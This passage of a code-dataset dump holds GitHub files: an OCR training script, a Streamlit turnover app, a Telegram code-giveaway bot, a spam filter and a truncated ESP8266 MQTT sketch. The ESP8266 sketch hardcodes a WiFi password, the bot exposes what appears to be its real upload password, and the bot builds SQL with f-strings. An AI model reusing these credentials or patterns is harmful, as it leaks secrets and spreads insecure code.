out_channels,\n },\n }\n return params\n\n\ndef loss_function(real, pred):\n loss_object = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')\n mask = tf.math.logical_not(tf.math.equal(real, 0))\n loss_ = loss_object(real, pred)\n mask = tf.cast(mask, dtype=loss_.dtype)\n loss_ *= mask\n return tf.reduce_mean(loss_)\n\n\ndef train_ocr_model(params):\n embedding_dim = 10\n units = 20\n vocab_size = len(params['alphabet'])\n num_steps = 10\n alphabet = '*- abcdefghijklmnopqrstuvwxyz0123456789' # {*: start, -: end}\n word_index = {char: idx for idx, char in enumerate(alphabet)}\n index_word = {idx: char for idx, char in enumerate(alphabet)}\n\n img_height = 16 * 4\n img_width = 16 * 16\n encoder = CNN_Encoder(embedding_dim, img_height, img_width)\n decoder = RNN_Decoder(embedding_dim, units, vocab_size)\n optimizer = tf.keras.optimizers.Adam()\n loss_plot = []\n\n @tf.function\n def train_step(img_tensor, target):\n loss = 0\n \"\"\"\n Reset of the hidden state for each batch\n \"\"\"\n batch_size = target.shape[0]\n sentence_len = target.shape[2]\n hidden = decoder.reset_state(batch_size=batch_size)\n dec_input = tf.expand_dims([word_index['*']] * batch_size, 1)\n with tf.GradientTape() as tape:\n features = encoder(img_tensor)\n for idx in range(1, sentence_len):\n # Passing the features through the decoder\n predictions, hidden, _ = decoder(dec_input, features, hidden)\n # print(1, predictions.numpy())\n target_char = tf.reshape(target[0, 0, idx, :], (1, target.shape[-1]))\n target_char = tf.argmax(target_char, axis=1)\n # print(2, target_char.eval())\n partial_loss = loss_function(target_char, predictions)\n loss += partial_loss\n # Using teacher forcing\n dec_input = tf.expand_dims(target_char, 1)\n total_loss = (loss / sentence_len)\n trainable_variables = encoder.trainable_variables + decoder.trainable_variables\n gradients = tape.gradient(loss, trainable_variables)\n optimizer.apply_gradients(zip(gradients, trainable_variables))\n return loss, total_loss\n\n epochs = 20\n\n dsize = params['dsize']\n model_params = params['model_params']\n in_folder = params['input_folder']\n 
alphabet = params['alphabet']\n #\n in_channels = model_params['in_channels']\n out_channels = model_params['out_channels']\n metadata = get_plates_text_metadata(params)\n metadata.file_name = 'plate_' + metadata.file_name\n metadata.file_name = metadata.file_name.str.split('.').str[0] + '.png'\n train_meta = metadata.query(\"set == 'train'\")\n train_meta = set_index(train_meta)\n model, preprocess_input = get_model_definition(**model_params)\n f_train_params = {\n 'folder': in_folder, 'metadata': train_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n data_train = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_train_params)\n for epoch in range(0, epochs):\n total_loss = 0\n for batch, (img_tensor, target) in enumerate(data_train):\n batch_loss, t_loss = train_step(img_tensor, target)\n total_loss += t_loss\n # logger.info(f\"target.mean(): {target.mean()}\")\n loss_debug = batch_loss.numpy() / int(target.shape[1])\n logger.info(f'Epoch {epoch + 1} Batch {batch} Loss {loss_debug}')\n # Storing the epoch end loss value to plot later\n loss_plot.append(total_loss / num_steps)\n logger.info(f'Epoch {epoch + 1} Loss {total_loss / num_steps}')\n\n\nif __name__ == \"__main__\":\n train_ocr_model(get_params())\n"
},
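A standalone sketch of the masking idea inside loss_function above: timesteps whose target index is 0 (the first alphabet entry, used as padding) contribute nothing to the loss. Shapes here are illustrative, not the script's batch layout:

import tensorflow as tf

real = tf.constant([[3, 5, 0]])              # last timestep is padding
pred = tf.random.uniform((1, 3, 40))         # logits over a 40-symbol alphabet
loss_object = tf.keras.losses.SparseCategoricalCrossentropy(
    from_logits=True, reduction='none')
mask = tf.cast(tf.math.logical_not(tf.math.equal(real, 0)), tf.float32)
loss = loss_object(real, pred) * mask        # padded position is zeroed out
print(tf.reduce_mean(loss))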
{
"alpha_fraction": 0.8129032254219055,
"alphanum_fraction": 0.8129032254219055,
"avg_line_length": 29.799999237060547,
"blob_id": "cb35e2f8566eb12a9d0b9fe8aa433dd5acc27e2b",
"content_id": "7e7bc5a3db448bca39b2fee966d33b5131be9bba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 155,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 5,
"path": "/README.md",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "# Pedro\nPedro: PlatE Detection and RecOgnition\n\nHere is a post explaining the project:\nhttps://sebacepeda.com/blog/license-plate-segmentation-recognition\n\n"
}
] | 29 | MamiyaA/DataScience-Fellow | https://github.com/MamiyaA/DataScience-Fellow | 71837a2cf5560a6951f9ccd9c021dc062d7cb71f | 917118e570078055e8be203cea96f9af64891feb | 96104e9e5aa8043a79e77cd00c244463e1851020 | refs/heads/master | 2020-12-20T13:03:17.742683 | 2020-10-09T06:22:16 | 2020-10-09T06:22:16 | 236,084,711 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7176221013069153,
"alphanum_fraction": 0.7448248267173767,
"avg_line_length": 35.39613342285156,
"blob_id": "ab384d550f91397437ab5f9bb29ea5303041491f",
"content_id": "8dee5bd6e4317fb9ab8cc03f02fa2fc77a35b6dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7536,
"license_type": "no_license",
"max_line_length": 243,
"num_lines": 207,
"path": "/FeaturePredictionForTurnover_Streamlit.py",
"repo_name": "MamiyaA/DataScience-Fellow",
"src_encoding": "UTF-8",
"text": "#import necessary packages\n#for the web app\nimport streamlit as st\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nsb.set()\ncolor = sb.color_palette()\nimport matplotlib as mpl\nimport pickle\nfrom sklearn import preprocessing as pp \nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\nfrom scipy.stats import pearsonr \nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import LassoCV\nfrom scipy.stats import wilcoxon\n\n#title of the app\nst.title('Top 3 features predicting employee turnover')\n\n# Loading data\nwith open('lasso_output.pickle', 'rb') as f: \n test_r_squared, lasso_alpha, lasso_coef = pickle.load(f)\n\nwith open('scaler.pickle', 'rb') as f: \n scalerEmployeeResponse, scalerOccupancyTurnover = pickle.load(f)\n\nwith open('original_values.pickle', 'rb') as f: \n TurnOver2, dataX2 = pickle.load(f)\n\nwith open('linear_output.pickle', 'rb') as f: \n linear_r_squared_df, linear_coef_df = pickle.load(f)\n\n#loading the dataframe\nfeature_set = pd.read_pickle(\"./feature_set.pkl\")\nturnOverRate = pd.read_pickle(\"./turnOverRate.pkl\")\nLocationCodeComprehensive = pd.read_pickle(\"./LocationCodeComprehensive.pkl\")\nlocation_pay = pd.read_pickle(\"./location_pay.pkl\")\nlocation_sd = pd.read_pickle(\"./location_sdS_df.pkl\")\nlasso_r_squared_df = pd.read_pickle(\"./lasso_r_squared_1000.pkl\")\nlasso_alpha_df = pd.read_pickle(\"./lasso_alpha_1000.pkl\")\nlasso_coef_df = pd.read_pickle(\"./lasso_coef_1000.pkl\")\nselected_features_interaction = pd.read_pickle(\"./selected_features_interaction.pkl\")\n\n#Rename the column\nLocationCodeComprehensive.rename(columns = {'Unnamed: 2':'location code'}, inplace = True) \n\n#Calculate mean\nmean_coef=lasso_coef_df.mean()\n\n#Chose top coefficients.\nabs_mean_coef=abs(mean_coef)\ntop_coef=abs_mean_coef.sort_values(ascending=False)\n\n#Put features together\nall_features = pd.concat([feature_set,location_pay,location_sd], axis = 1)\n\n#Side bar with choice of location\nlocation = st.sidebar.selectbox(\n 'Select your location',\n LocationCodeComprehensive)\n\n#Index for current location\nindex = LocationCodeComprehensive==location\n\nselected_features_interaction2=pd.DataFrame(data=selected_features_interaction)\nx_linear = selected_features_interaction\n\n#Calculate the mean for the coefficients\nmean_linear_coef=linear_coef_df.mean()\n\nPredictionMatrix=x_linear.multiply(mean_linear_coef)\nPredictionValue=PredictionMatrix.sum(axis=1)\n\n#User chose how much to reduce, figure out how much do we need to reduce in the log transformed scaled unit.\nTurnOver2=TurnOver2.reset_index(drop=True)\ndataX2=dataX2.reset_index(drop=True)\ndataX2.columns = range(dataX2.shape[1])\nbase_turnover=TurnOver2[index]\n\nmean_coef_reduced = mean_linear_coef.apply(lambda x: round(x, 2 - int(np.floor(np.log10(abs(x))))))\n\nst.subheader(\"Feature 55: Provide excellent service\")\nst.write(mean_coef_reduced[0])\n\nst.subheader(\"Feature 62: Chef's tenure\")\nst.write(mean_coef_reduced[1])\n\nst.subheader(\"Feature 21: Managers avoid playing favorites\")\nst.write(mean_coef_reduced[2])\n\nst.markdown('***')\n\nst.subheader(\"Current and target turnover rate for your location (%)\")\n\n\n#slider for choosing the goal turnover rate\nnew_turnover = st.slider('Goal turn over rate (%)', 0, 400, 100)\nnew_turnover = new_turnover/100\n\n#Plot the current and target turnover rate\nfig, 
(ax1, ax2) = plt.subplots(1, 2, sharey=True)\nsb.barplot(TurnOver2[index]*100, orient = 'v', ax =ax1)\nax1.set_ylabel('turnover rate (%)')\nax1.set_xlabel('current')\nax1.set_ylim((0,400)) \nsb.barplot(new_turnover*100, orient = 'v', color = 'red', ax = ax2)\nax2.set_xlabel('target')\nst.pyplot()\n\n\n#new_turnover = base_turnover*(1-(percent_turnover/100))\nlog_new_turnover = np.log(new_turnover+0.1)\nscaled_turnover = (log_new_turnover-scalerOccupancyTurnover.mean_[1])/scalerOccupancyTurnover.scale_[1]\n\ncurrent_turnover = turnOverRate[index]\nturnover_change = scaled_turnover-current_turnover\n#currently assumes we use the top component and have selected 3 features.\nfeature_change = turnover_change/(mean_linear_coef[0]+mean_linear_coef[3]*selected_features_interaction2.loc[LocationCodeComprehensive==location,1]+mean_linear_coef[4]*selected_features_interaction2.loc[LocationCodeComprehensive==location,2])\n\n#bring it back to what it means in the raw data scale. The raw value of the feature has to be between 0 and 1.\nnew_feature = selected_features_interaction2.loc[LocationCodeComprehensive==location,0]+feature_change\n\nnew_feature_before_scale = (new_feature*scalerEmployeeResponse.scale_[55])+scalerEmployeeResponse.mean_[55]\nnew_feature_before_transform = 1.1-np.exp(0.1-new_feature_before_scale)\ncurrent_feature = dataX2.loc[LocationCodeComprehensive==location,55]\n\nst.markdown('***')\n\nst.subheader(\"Current and target scores for the (Q55: Provide excellent service)\")\n\n#Plot the current and target score\nfig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n#current score\nsb.barplot(current_feature.iloc[0], orient = 'v', ax =ax1)\nax1.set_ylabel('score (Q55) (%)')\nax1.set_xlabel('current')\nax1.set_ylim((0,1)) \n\n#TargetScore\n#need to check if we reached the limit (score must be between 0 and 1)\nTargetScore = new_feature_before_transform.iloc[0]\nif TargetScore >= 0 and TargetScore <= 1:\n sb.barplot(TargetScore, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\nelif TargetScore < 0:\n sb.barplot(0, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 0 reached score limit')\nelif TargetScore > 1:\n sb.barplot(1, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 1 reached score limit')\n\n\n\nst.markdown('***')\n#have option for the 2nd question.\nfeature_change2 = turnover_change/(mean_linear_coef[2]+mean_linear_coef[4]*selected_features_interaction2.loc[LocationCodeComprehensive==location,0]+mean_linear_coef[5]*selected_features_interaction2.loc[LocationCodeComprehensive==location,1])\n\n#bring it back to what it means in the raw data scale. 
The raw value of the feature has to be between 0 and 1.\nnew_feature2 = selected_features_interaction2.loc[LocationCodeComprehensive==location,2]+feature_change2\n\nnew_feature_before_scale2 = (new_feature2*scalerEmployeeResponse.scale_[21])+scalerEmployeeResponse.mean_[21]\nnew_feature_before_transform2 = 1.1-np.exp(0.1-new_feature_before_scale2)\ncurrent_feature2 = dataX2.loc[LocationCodeComprehensive==location,21]\n\n\nst.subheader(\"Current and target scores for the (Q21: Managers avoid playing favorites)\")\n\n#Plot the current and target score\nfig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n#current score\nsb.barplot(current_feature2.iloc[0], orient = 'v', ax =ax1)\nax1.set_ylabel('score (Q21) (%)')\nax1.set_xlabel('current')\nax1.set_ylim((0,1)) \n\n#TargetScore\n#need to check if we reached the limit (score must be between 0 and 1)\nTargetScore2 = new_feature_before_transform2.iloc[0]\nif TargetScore2 >= 0 and TargetScore2 <= 1:\n sb.barplot(TargetScore2, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\nelif TargetScore2 < 0:\n sb.barplot(0, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 0 reached score limit')\nelif TargetScore2 > 1:\n sb.barplot(1, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 1 reached score limit')\n\n\n"
},
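The inverse formulas in the script above imply the forward transforms sketched below; this round-trip is inferred from the code, not taken from the training notebooks:

import numpy as np

def score_to_model_space(raw):   # forward: raw survey score in [0, 1]
    return 0.1 - np.log(1.1 - raw)

def model_space_to_score(v):     # inverse, as used in the app
    return 1.1 - np.exp(0.1 - v)

raw = 0.8
assert np.isclose(model_space_to_score(score_to_model_space(raw)), raw)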
{
"alpha_fraction": 0.8158971071243286,
"alphanum_fraction": 0.8188194036483765,
"avg_line_length": 76.7727279663086,
"blob_id": "1227ca62df6f2492bb073d62773a1b4d46bc5538",
"content_id": "1f756f0ee3cc14d6bf844436cec2a1af9f93c092",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1719,
"license_type": "no_license",
"max_line_length": 327,
"num_lines": 22,
"path": "/README.md",
"repo_name": "MamiyaA/DataScience-Fellow",
"src_encoding": "UTF-8",
"text": "# FeatureFinder\n\n\nData exploration and pre-processing:\n\nDataExplorationAndPreProcessing.ipynb: Load the employee turnover rate, employee’s answers to the questions, tenure of key positions, and median household income for the location (from US Census). Transform the data to make it normally distributed, standardize the data, save the data.\n\nAddingEmployeeSalary.ipynb: Load the salary for each employee and calculate the median salary for each location. Standardize the data and save it.\n\nAddingResponseStandardDeviation.ipynb: Load the individual employee’s answers to the questions and calculate how varied the responses are at each location. Standardize and save it.\n\nRegression Analysis:\n\nRun_LassoRegression_and_Average.ipynb: Load all the features saved by the notebooks above, and run Lasso regression (1000 times). Produce a model that predicts employee turnover rate using few selected features. Save the results for linear regression step.\n\nLinearRegressionWithInteractions.ipynb: Load the results of the lasso regression. Choose the top 3 features and run linear regression using these features and their interactions. A model confirms the validity of the features and shows that interactions are not significantly big. Save the results for the use in Streamlit app. \n\nInteractive Web App:\n\nFeaturePredictionForTurnover_Streamlit.py: A Python script for \"Streamlit\" Web app. The app will interactively show how much each senior care center has to improve on key features in order to meet their \"target\" emplyee turn over rate.\n\nFor running the Web App, please install “Streamlit” from (https://www.streamlit.io/), and run the file by typing: streamlit run FeaturePredictionForTurnover_Streamlit.py\n"
}
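The selection step this README describes can be sketched as follows (synthetic data; the actual notebooks average coefficients over 1000 Lasso fits of the project's features, so sizes and indices here are assumptions):

import numpy as np
from sklearn.linear_model import Lasso
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 60))
y = 2 * X[:, 55] - X[:, 21] + rng.normal(scale=0.1, size=100)

coefs = []
for seed in range(100):
    X_tr, _, y_tr, _ = train_test_split(X, y, test_size=0.2, random_state=seed)
    coefs.append(Lasso(alpha=0.05).fit(X_tr, y_tr).coef_)
top3 = np.argsort(-np.abs(np.mean(coefs, axis=0)))[:3]
print(top3)  # indices of the most stable predictors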
] | 2 | VovaSheliag/Bot | https://github.com/VovaSheliag/Bot | c74903c46363fb7940fadcfc5d56adc1bad6bd85 | fd3d077a17398b1a2d9fd6a1769d09e155abb994 | 3d5f326452eddcff35236afd37dc340e1bf73300 | refs/heads/main | 2023-07-25T18:12:44.457591 | 2021-09-07T08:21:50 | 2021-09-07T08:21:50 | 403,898,719 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.47836539149284363,
"alphanum_fraction": 0.7019230723381042,
"avg_line_length": 15.640000343322754,
"blob_id": "76d8c9b6dd37bc5af68f9e5d53fbc3e247c31574",
"content_id": "ee59384e1641c2d4916a372ee53796860a07bba6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 416,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 25,
"path": "/requirements.txt",
"repo_name": "VovaSheliag/Bot",
"src_encoding": "UTF-8",
"text": "attrs==21.2.0\ncertifi==2021.5.30\ncffi==1.14.6\nchardet==4.0.0\ncryptography==3.4.7\ngreenlet==1.1.0\nidna==2.10\niniconfig==1.1.1\npackaging==21.0\npluggy==0.13.1\npy==1.10.0\npyasn1==0.4.8\npyasn1-modules==0.2.8\npycparser==2.20\npyOpenSSL==20.0.1\npyparsing==2.4.7\npyTelegramBotAPI==3.7.6\npytest==6.2.4\nrequests==2.25.1\nservice-identity==21.1.0\nsix==1.16.0\nSQLAlchemy==1.4.22\nTelegramBotAPI==0.3.2\ntoml==0.10.2\nurllib3==1.26.6\n"
},
{
"alpha_fraction": 0.6241829991340637,
"alphanum_fraction": 0.6392659544944763,
"avg_line_length": 32.42856979370117,
"blob_id": "13aeb81b2e363ab55ee23be4c7f560484019d17f",
"content_id": "60c98d320ffd4fcbee14c61719f472d2a5444d76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4427,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 119,
"path": "/main.py",
"repo_name": "VovaSheliag/Bot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport telebot\nimport re\nimport sqlite3\n\nbot = telebot.TeleBot(\"Token\")\npassword = '*******'\nchat_observe = False\nsend_null_codes_info = False\n\ndb = sqlite3.connect('user_db.db', check_same_thread=False)\nsql = db.cursor()\n\n\[email protected]_handler(commands=['start'])\ndef send_welcome(message):\n bot.send_message(message.from_user.id, f'Welcome {message.from_user.first_name}')\n\n\[email protected]_handler(commands=['uploadcodes'])\ndef upload_codes(message):\n global chat_observe, send_null_codes_info\n upload_pass = message.text.replace('/uploadcodes ', '').strip().split('\\n')[0]\n if upload_pass.replace(' ', '') == password:\n restart()\n codes = re.findall(r'\\w{5}-\\w{5}-\\w{5}-\\w{5}-\\w{5}', message.text.replace('/uploadcodes a7H6BvF66b', ''))\n while '' in codes:\n codes.remove('')\n if len(codes) > 100:\n bot.send_message(message.chat.id, 'Ошибка, можно загружать только 100 кодов')\n return 0\n for i in range(len(codes)):\n add_code(codes[i])\n if len(codes) == 0:\n return 0\n bot.send_message(-1001259856561, \"\"\"Доступны коды для арены! Чтобы получить код:\n 1. Напишите в личные сообщения чат-боту mw_arena_bot “/start”. Достаточно сделать это всего один раз, потом этот шаг можно пропускать.\n 2. Напишите в в личные сообщения боту команду /getcode\n 3. Один человек может получить один код\n \"\"\")\n chat_observe = False\n else:\n bot.send_message(message.chat.id, \"Неправильный пароль\")\n\n\[email protected]_handler(commands=['getcode'])\ndef get_code(message):\n global chat_observe, send_null_codes_info\n if len(db_codes().fetchall()) == 0:\n bot.send_message(message.from_user.id, 'Уже все коды разобрали, но я сообщу если будут еще')\n if not chat_observe:\n bot.send_message(-1001259856561, 'На сегодня всё, все коды разобрали, но я сообщу если будут еще')\n chat_observe = True\n return 0\n if (check_user_not_in_db(message.from_user.id)) and (message.chat.id == message.from_user.id):\n bot.send_message(message.from_user.id, get_db_code(message.from_user.id))\n elif check_user_in_db(message.from_user.id):\n bot.send_message(message.chat.id, 'ЕДХ - лучший формат магии, приходите в пятницу на вечер коммандера')\n elif message.chat.id != message.from_user.id:\n bot.send_message(message.chat.id, '/getcode работает только в личном чате с ботом')\n\n\[email protected]_handler(commands=['deletecodes'])\ndef deletecodes(message):\n sql = db.cursor()\n delete_pass = message.text.replace('/deletecodes', '').replace(' ', '').strip().split('\\n')[0]\n if delete_pass == password:\n sql.execute(\"DELETE FROM codes\")\n db.commit()\n bot.send_message(message.chat.id, 'Коды удалены')\n else:\n bot.send_message(message.chat.id, 'Неправильный пароль')\n\n\ndef restart():\n global chat_observe\n sql.execute(\"DELETE FROM users\")\n db.commit()\n sql.execute(\"DELETE FROM codes\")\n db.commit()\n chat_observe = False\n\n\ndef get_db_code(user_id):\n code = sql.execute(f\"SELECT code FROM codes LIMIT 1\").fetchall()[0][0]\n db.commit()\n sql.execute(\"DELETE from codes LIMIT 1\")\n db.commit()\n sql.execute(f\"INSERT INTO users VALUES({user_id})\")\n db.commit()\n return code\n\n\ndef add_code(code):\n sql.execute(f\"INSERT INTO codes VALUES(?)\", (code,))\n db.commit()\n\n\ndef all_users():\n users = sql.execute(\"\"\"SELECT * FROM users\"\"\")\n db.commit()\n return users\n\n\ndef check_user_not_in_db(user_id):\n return len(sql.execute(f\"\"\"SELECT user_id FROM users WHERE user_id={user_id}\"\"\").fetchall()) == 0\n\n\ndef 
check_user_in_db(user_id):\n return len(sql.execute(f\"\"\" SELECT user_id FROM users WHERE user_id={user_id}\"\"\").fetchall()) == 1\n\n\ndef db_codes():\n db_codes = sql.execute(\"\"\"SELECT * FROM codes\"\"\")\n db.commit()\n return db_codes\n\n\nbot.polling(none_stop=True)\n"
}
] | 2 | luckynwj7/SpamProject | https://github.com/luckynwj7/SpamProject | ec5cb830af544e96cefd0314cc4324af0f112def | 6b4d5bc4c1aebbe017dc9d7de3f197710db1b7e2 | 994718d4a744031fef5293ab2a470e5aa4086043 | refs/heads/master | 2020-09-22T12:46:26.562141 | 2019-12-03T11:34:26 | 2019-12-03T11:34:26 | 225,201,179 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6046025156974792,
"alphanum_fraction": 0.6046025156974792,
"avg_line_length": 23.157894134521484,
"blob_id": "6f84ab5d15442490f77da59eff7d50d1858ef46f",
"content_id": "e0a363fbfebc799991a585e87be5983db48cba25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/SpamExamplePredict.py",
"repo_name": "luckynwj7/SpamProject",
"src_encoding": "UTF-8",
"text": "import pickle\r\n\r\nwith open('./model/spam_mail_filter.model', 'rb') as file:\r\n spamFilterModel = pickle.load(file)\r\n \r\n\r\nprint(\"스팸메일 아닌 예시\")\r\nhamExam = open(\"./example/hamExam.txt\", 'r').read()\r\nprint(hamExam)\r\npre = spamFilterModel.predict(hamExam)\r\nprint(\"결과 =\", pre)\r\n\r\nprint(\"-----------------------------------\")\r\n\r\nprint(\"스팸메일인 예시\")\r\nspamExam = open(\"./example/spamExam.txt\", 'r').read()\r\nprint(spamExam)\r\npre = spamFilterModel.predict(spamExam)\r\nprint(\"결과 =\", pre)\r\n"
},
{
"alpha_fraction": 0.6695652008056641,
"alphanum_fraction": 0.6695652008056641,
"avg_line_length": 21,
"blob_id": "ed3fd4d00dfaef35afa264dcb14512da17b22247",
"content_id": "efcf512f8c40eb6929360eeeb509e1171a6a316a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 258,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 10,
"path": "/SpamFilterExec.py",
"repo_name": "luckynwj7/SpamProject",
"src_encoding": "UTF-8",
"text": "import pickle\r\n\r\nwith open('./model/spam_mail_filter.model', 'rb') as file:\r\n spamFilterModel = pickle.load(file)\r\n\r\n \r\nprint(\"검사할 내용을 입력해주세요\")\r\ncontents=input()\r\npre = spamFilterModel.predict(contents)\r\nprint(\"결과 =\", pre)\r\n"
},
{
"alpha_fraction": 0.6039999723434448,
"alphanum_fraction": 0.6200000047683716,
"avg_line_length": 19.23404312133789,
"blob_id": "d0ff67e6a8d737251dd30c5257ad97570b6069e9",
"content_id": "3b726a7cb7de62c2989c4a23cfa41be92a15227c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1106,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 47,
"path": "/SpamFilterFit.py",
"repo_name": "luckynwj7/SpamProject",
"src_encoding": "UTF-8",
"text": "from SpamFilterClass import SpamMailFilter\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nimport csv, codecs\r\nimport pandas as pd\r\nimport pickle\r\n\r\n\r\n\r\n# 클래스 사용하기 \r\nsFilter = SpamMailFilter()\r\n\r\n# CSV 파일 열기\r\nfilePath = \"./dataset/spam.csv\"\r\nfp = codecs.open(filePath, \"r\", \"utf-8\")\r\n# 한 줄씩 읽어 들이기\r\nreader = csv.reader(fp, delimiter=\",\", quotechar='\"')\r\n\r\n# pandas 데이터 프레임에 입력하기\r\ndf=pd.DataFrame({\"text\":[0], \"category\":[0]})\r\ni=0\r\nfor cells in reader:\r\n df.loc[i]=(cells[1], cells[0])\r\n i+=1\r\n\r\n# 데이터 나누기\r\ntrain, test = train_test_split(df, test_size=0.2, random_state=123)\r\n\r\n# 학습\r\nfor idx in train.index:\r\n sFilter.fit(train[\"text\"][idx], train[\"category\"][idx])\r\n\r\n# 모델 생성\r\nwith open('./model/spam_mail_filter.model', 'wb') as file:\r\n pickle.dump(sFilter, file)\r\nprint(\"모델 생성 완료\")\r\n\r\n \r\n# 예측\r\nok=0\r\ncase=0\r\nfor idx in test.index:\r\n case+=1\r\n pre = sFilter.predict(test[\"text\"][idx])\r\n if test[\"category\"][idx]==pre:\r\n ok+=1\r\nprint(\"정확도 : \", ok/case)\r\n\r\n"
}
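SpamFilterClass.py itself is not part of this listing; the skeleton below is an assumption, a minimal naive-Bayes-style class consistent with the fit(text, category) / predict(text) calls used in the scripts above, not the project's actual implementation. Plain dicts are used so the object pickles cleanly:

import math

class SpamMailFilter:
    def __init__(self):
        self.word_counts = {}      # category -> {word: count}
        self.category_counts = {}  # category -> document count

    def fit(self, text, category):
        self.category_counts[category] = self.category_counts.get(category, 0) + 1
        counts = self.word_counts.setdefault(category, {})
        for word in text.lower().split():
            counts[word] = counts.get(word, 0) + 1

    def predict(self, text):
        words = text.lower().split()
        vocab = {w for counts in self.word_counts.values() for w in counts}
        total_docs = sum(self.category_counts.values())
        best_category, best_score = None, float('-inf')
        for category, doc_count in self.category_counts.items():
            score = math.log(doc_count / total_docs)  # log prior
            counts = self.word_counts[category]
            denom = sum(counts.values()) + len(vocab) + 1  # add-one smoothing
            for word in words:
                score += math.log((counts.get(word, 0) + 1) / denom)
            if score > best_score:
                best_category, best_score = category, score
        return best_category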
] | 3 | jdawson91/MQTT-esp8266 | https://github.com/jdawson91/MQTT-esp8266 | 19af9b1ff95b17b9c8932e646729da5f971dfed8 | e59e7e911633dac311a33f2c62a7910d019de829 | 327dd1fb40a036d123fddbe8a4ad582c24877f92 | refs/heads/master | 2021-01-10T08:55:39.049414 | 2016-04-22T10:46:58 | 2016-04-22T10:46:58 | 52,673,909 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.58670574426651,
"alphanum_fraction": 0.6054741144180298,
"avg_line_length": 25.50259017944336,
"blob_id": "bec52d9478d411343299523c2a0396b71f9b7caf",
"content_id": "29575628b7a86de7e2e8a7559b5a4babbca2bdf8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5115,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 193,
"path": "/sketch_feb17a.ino",
"repo_name": "jdawson91/MQTT-esp8266",
"src_encoding": "UTF-8",
"text": "#include <DallasTemperature.h>\n#include <OneWire.h>\n#include <ESP8266WiFi.h>\n#include \"Adafruit_MQTT.h\"\n#include \"Adafruit_MQTT_Client.h\"\n\n/****************************** Heater Pins ******************************************/\nint Heater[] = {2, 5, 4};\n\n/****************************** Temp ******************************************/\n#define REPORT_INTERVAL 10 // in sec\n#define NO_SENSORS 3\n#define ONE_WIRE_BUS 13 // DS18B20 pin\nOneWire oneWire(ONE_WIRE_BUS);\nDallasTemperature DS18B20(&oneWire);\n\n/************************* WiFi Access Point *********************************/\n\n#define WLAN_SSID \"NETGEAR\"\n#define WLAN_PASS \"def4543aa3\"\n\n/************************* MQTT Setup *********************************/\n\n#define AIO_SERVER \"192.168.3.13\"\n#define AIO_SERVERPORT 1883\n#define AIO_USERNAME \"\"\n#define AIO_KEY \"\"\n\n/**************** Global State (default settings) **********************/\n\n// Create an ESP8266 WiFiClient class to connect to the MQTT server.\nWiFiClient client;\n\n// Store the MQTT server, client ID, username, and password in flash memory.\n// This is required for using the Adafruit MQTT library.\nconst char MQTT_SERVER[] PROGMEM = AIO_SERVER;\n// Set a unique MQTT client ID using the AIO key + the date and time the sketch\n// was compiled (so this should be unique across multiple devices for a user,\n// alternatively you can manually set this to a GUID or other random value).\nconst char MQTT_CLIENTID[] PROGMEM = __TIME__ AIO_USERNAME;\nconst char MQTT_USERNAME[] PROGMEM = AIO_USERNAME;\nconst char MQTT_PASSWORD[] PROGMEM = AIO_KEY;\n\n// Setup the MQTT client class by passing in the WiFi client and MQTT server and login details.\nAdafruit_MQTT_Client mqtt(&client, MQTT_SERVER, AIO_SERVERPORT, MQTT_CLIENTID, MQTT_USERNAME, MQTT_PASSWORD);\n\n\n/****************************** Feeds ***************************************/\n\n// Setup a feed called 'heaters' for subscribing to changes.\n// Notice MQTT paths for AIO follow the form: <username>/feeds/<feedname>\nconst char HEATER_FEED[] PROGMEM = \"HEATER_FEED\";\nAdafruit_MQTT_Subscribe heaters = Adafruit_MQTT_Subscribe(&mqtt, HEATER_FEED);\n\n\n\n// function prototypes\nvoid 